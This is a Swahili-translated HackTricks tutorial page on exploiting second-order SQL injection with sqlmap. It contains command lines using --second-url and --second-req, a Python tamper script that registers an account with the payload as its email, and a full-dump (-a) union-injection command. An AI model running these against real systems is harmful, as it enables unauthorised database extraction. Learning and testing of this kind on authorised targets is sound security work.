Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Second Order Injection - SQLMap

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

SQLMap inaweza kutumia Second Order SQLis. Unahitaji kutoa:

  • Ombi ambapo malipo ya sqlinjection yatahifadhiwa

  • Ombi ambapo malipo yatakuwa yamefanywa

Ombi ambapo malipo ya SQL injection yamehifadhiwa imeonyeshwa kama kwenye sindano nyingine yoyote katika sqlmap. Ombi ambapo sqlmap inaweza kusoma pato/utekelezaji wa sindano inaweza kuonyeshwa na --second-url au na --second-req ikiwa unahitaji kuonyesha ombi kamili kutoka kwenye faili.

Mfano rahisi wa second order:

#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"

#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt

Katika visa kadhaa hii haitoshi kwa sababu utahitaji kufanya hatua nyingine mbali na kutuma mzigo na kupata upatikanaji wa ukurasa tofauti.

Wakati hii inahitajika, unaweza kutumia sqlmap tamper. Kwa mfano, hati ifuatayo itasajili mtumiaji mpya kwa kutumia mzigo wa sqlmap kama barua pepe na kisha kujitoka.

#!/usr/bin/env python

import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
pass

def login_account(payload):
proxies = {'http':'http://127.0.0.1:8080'}
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}

params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
url = "http://10.10.10.10/create.php"
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

url = "http://10.10.10.10/exit.php"
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
login_account(payload)
return payload

Tamper scripts za SQLMap zinatekelezwa kabla ya kuanza jaribio la kuingiza payload na lazima irudishe payload. Katika kesi hii, hatujali payload lakini tunajali kutuma maombi fulani, kwa hivyo payload haijabadilishwa.

Kwa hivyo, ikiwa kwa sababu fulani tunahitaji mchakato wenye nguvu zaidi wa kufaidika na SQL injection ya pili kama:

  • Unda akaunti na payload ya SQLi ndani ya uga wa "barua pepe"

  • Toka

  • Ingia na akaunti hiyo (login.txt)

  • Tuma ombi la kutekeleza SQL injection (second.txt)

Mstari huu wa sqlmap utasaidia:

sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousSQLMap - CheetsheatNextSSRF (Server Side Request Forgery)

Last updated